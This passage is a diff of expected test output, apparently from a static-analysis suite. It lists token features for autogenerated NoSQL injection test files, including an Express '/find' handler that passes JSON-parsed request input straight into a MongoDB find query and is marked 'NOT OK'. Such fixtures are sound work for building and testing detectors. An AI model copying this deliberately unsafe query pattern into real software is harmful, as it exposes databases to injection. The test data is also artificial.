autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:8 | find | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:8 | find | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:8 | find | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | 'arguments' object of method find of interface Query | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | 'arguments' object of method find of interface Query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | 'arguments' object of method find of interface Query | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | exceptional return of method find of interface Query | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | exceptional return of method find of interface Query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | exceptional return of method find of interface Query | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | contextSurroundingFunctionParameters | (query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | find(qu ... ): any; | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | return of method find of interface Query | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | return of method find of interface Query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:5:11:26 | return of method find of interface Query | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:10:11:14 | query | contextFunctionInterfaces | find(query)\nfind(query)\nfind(query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:10:11:14 | query | contextSurroundingFunctionParameters | (query) | +| autogenerated/NosqlAndSqlInjection/typed/shim.d.ts:11:10:11:14 | query | fileImports | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:1:1:0 | this | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:1:1:0 | this | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:8:1:19 | * as mongodb | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:8:1:19 | * as mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:8:1:19 | * as mongodb | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:13:1:19 | mongodb | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:13:1:19 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:13:1:19 | mongodb | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:26:1:34 | "mongodb" | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:26:1:34 | "mongodb" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:1:26:1:34 | "mongodb" | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:13 | express | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:13 | express | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:41 | express | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:41 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:41 | express | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:41 | express ... as any | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:41 | express ... as any | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:7:3:41 | express ... as any | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:23 | require | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:23 | require | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:34 | exceptional return of require("express") | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:34 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:34 | exceptional return of require("express") | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:34 | require("express") | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:34 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:34 | require("express") | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:41 | require ... as any | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:41 | require ... as any | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:17:3:41 | require ... as any | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:25:3:33 | "express" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:25:3:33 | "express" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:25:3:33 | "express" | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:25:3:33 | "express" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:3:25:3:33 | "express" | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:16 | bodyParser | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:16 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:16 | bodyParser | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:48 | bodyPar ... as any | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:48 | bodyPar ... as any | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:48 | bodyPar ... as any | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:48 | bodyParser | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:48 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:7:4:48 | bodyParser | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:26 | require | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:26 | require | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:41 | exceptional return of require ... arser") | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:41 | exceptional return of require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:41 | exceptional return of require ... arser") | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:41 | require ... arser") | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:41 | require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:41 | require ... arser") | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:48 | require ... as any | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:48 | require ... as any | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:20:4:48 | require ... as any | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:28:4:40 | "body-parser" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:28:4:40 | "body-parser" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:28:4:40 | "body-parser" | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:28:4:40 | "body-parser" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:4:28:4:40 | "body-parser" | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | 'arguments' object of function getCollection | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | 'arguments' object of function getCollection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | 'arguments' object of function getCollection | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | declare ... ection; | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | declare ... ection; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | declare ... ection; | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | exceptional return of function getCollection | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | exceptional return of function getCollection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | exceptional return of function getCollection | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | return of function getCollection | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | return of function getCollection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:1:6:53 | return of function getCollection | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:18:6:30 | getCollection | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:18:6:30 | getCollection | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:6:18:6:30 | getCollection | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:7 | app | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:7 | app | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:19 | app | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:19 | app | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:19 | app = express() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:5:8:19 | app = express() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:17 | express | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:17 | express | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:19 | exceptional return of express() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:19 | exceptional return of express() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:19 | express() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:8:11:8:19 | express() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:3 | app | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:3 | app | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:7 | app.use | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:7 | app.use | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:26 | app.use ... json()) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:26 | app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:26 | app.use ... json()) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:26 | exceptional return of app.use ... json()) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:26 | exceptional return of app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:1:10:26 | exceptional return of app.use ... json()) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:5:10:7 | use | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:5:10:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:5:10:7 | use | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:18 | bodyParser | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:18 | bodyParser | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:23 | bodyParser.json | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:23 | bodyParser.json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:23 | bodyParser.json | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | bodyParser.json() | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | bodyParser.json() | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | bodyParser.json() | calleeImports | express | @@ -16,6 +205,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | bodyParser.json() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | bodyParser.json() | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | bodyParser.json() | receiverName | app | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | exceptional return of bodyParser.json() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | exceptional return of bodyParser.json() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:9:10:25 | exceptional return of bodyParser.json() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:20:10:23 | json | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:20:10:23 | json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:10:20:10:23 | json | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:12:3 | app | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:12:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:12:3 | app | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:12:8 | app.post | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:12:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:12:8 | app.post | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:15:2 | app.pos ... T OK\\n}) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:15:2 | app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:15:2 | app.pos ... T OK\\n}) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:15:2 | exceptional return of app.pos ... T OK\\n}) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:15:2 | exceptional return of app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:1:15:2 | exceptional return of app.pos ... T OK\\n}) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:5:12:8 | post | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:5:12:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:5:12:8 | post | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:10:12:16 | "/find" | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:10:12:16 | "/find" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:10:12:16 | "/find" | calleeImports | express | @@ -23,6 +233,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:10:12:16 | "/find" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:10:12:16 | "/find" | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:10:12:16 | "/find" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | 'arguments' object of anonymous function | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -30,6 +245,81 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | (req, r ... OT OK\\n} | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | exceptional return of anonymous function | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | exceptional return of anonymous function | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | return of anonymous function | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | return of anonymous function | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:19:15:1 | return of anonymous function | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | enclosingFunctionBody | req res v JSON parse req body x getCollection find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:20:12:22 | req | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:25:12:27 | res | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:25:12:27 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:12:25:12:27 | res | enclosingFunctionBody | req res v JSON parse req body x 